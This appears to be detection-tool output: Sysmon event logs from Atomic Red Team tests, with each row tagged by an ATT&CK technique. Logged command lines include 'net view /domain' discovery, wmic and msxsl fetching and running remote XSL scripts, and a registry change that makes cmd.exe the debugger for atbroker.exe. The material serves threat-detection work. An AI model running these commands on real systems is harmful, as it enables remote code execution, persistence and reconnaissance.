C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "net view" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547882.333688,2019-07-19T18:51:22.333688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "net view" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3770 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:22.302 + 747F3D96-D8EA-5D31-0000-001030B63300 + 1988 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "net view" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3769 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:09.839 + 747F3D96-D8DD-5D31-0000-001043953300 + 3012 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net view /domain + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D8DD-5D31-0000-0010EF923300 + 4856 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "net view /domain" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1018] Remote System Discovery - Process,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3769 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:09.839 + 747F3D96-D8DD-5D31-0000-001043953300 + 3012 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net view /domain + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D8DD-5D31-0000-0010EF923300 + 4856 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "net view /domain" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547869.845415,2019-07-19T18:51:09.845415+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "net view /domain" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3768 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:09.804 + 747F3D96-D8DD-5D31-0000-0010EF923300 + 4856 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "net view /domain" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547869.823311,2019-07-19T18:51:09.823311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3767 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:06.873 + 747F3D96-D8DA-5D31-0000-00100D8A3300 + 4016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1563547866.88803,2019-07-19T18:51:06.888030+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3766 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:06.748 + 747F3D96-D8DA-5D31-0000-001029863300 + 3220 + C:\Windows\System32\wbem\WMIC.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E + 747F3D96-D8DA-5D31-0000-0010D3833300 + 5340 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3765 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:06.714 + 747F3D96-D8DA-5D31-0000-0010D3833300 + 5340 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3765 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:06.714 + 747F3D96-D8DA-5D31-0000-0010D3833300 + 5340 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1603194656.569246,2020-10-20T15:50:56.569246+04:00,,Threat,Low,Found User (DESKTOP-NTSSLJD\den) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 988 + + + + + Microsoft-Windows-Sysmon/Operational + DESKTOP-NTSSLJD + + + + + technique_id=T1059.003,technique_name=Windows Command Shell + 2020-10-20 11:50:56.472 + 23F38D93-CF20-5F8E-D008-000000000C00 + 9620 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + DESKTOP-NTSSLJD\den + 23F38D93-AE9B-5F8E-A2EC-170000000000 + 0x17eca2 + 2 + High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 23F38D93-CF20-5F8E-CE08-000000000C00 + 6896 + C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe + C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe + +",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547866.728089,2019-07-19T18:51:06.728089+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3764 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:56.162 + 747F3D96-D8D0-5D31-0000-001034673300 + 396 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1563547856.18299,2019-07-19T18:50:56.182990+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:list ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3763 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:56.021 + 747F3D96-D8D0-5D31-0000-0010F3623300 + 7040 + C:\Windows\System32\wbem\WMIC.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + wmic.exe process /FORMAT:list + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E + 747F3D96-D8CF-5D31-0000-00109B603300 + 5380 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3762 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:55.978 + 747F3D96-D8CF-5D31-0000-00109B603300 + 5380 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3762 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:55.978 + 747F3D96-D8CF-5D31-0000-00109B603300 + 5380 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547855.991996,2019-07-19T18:50:55.991996+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3761 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:53.038 + 747F3D96-D8CD-5D31-0000-001047543300 + 1852 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547853.062635,2019-07-19T18:50:53.062635+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3760 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:52.989 + 747F3D96-D8CC-5D31-0000-001038513300 + 948 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547853.011281,2019-07-19T18:50:53.011281+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3759 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:50.067 + 747F3D96-D8CA-5D31-0000-0010CF443300 + 6268 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547850.086593,2019-07-19T18:50:50.086593+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3758 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:50.029 + 747F3D96-D8CA-5D31-0000-0010DA413300 + 4004 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1563547850.046476,2019-07-19T18:50:50.046476+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ams15s30-in-f4.1e100.net ) , IP ( 172.217.17.132 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 3757 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-19 14:50:20.871 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49727 + + false + 172.217.17.132 + ams15s30-in-f4.1e100.net + 80 + http + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547825.37603,2019-07-19T18:50:25.376030+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3756 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:19.533 + 747F3D96-D8AB-5D31-0000-0010A4D53200 + 1888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547819.491237,2019-07-19T18:50:19.491237+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3753 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:19.455 + 747F3D96-D8AB-5D31-0000-001054D03200 + 6244 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547819.467476,2019-07-19T18:50:19.467476+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3752 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:18.000 + 747F3D96-D8AA-5D31-0000-0010C0C93200 + 6016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547817.963904,2019-07-19T18:50:17.963904+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " 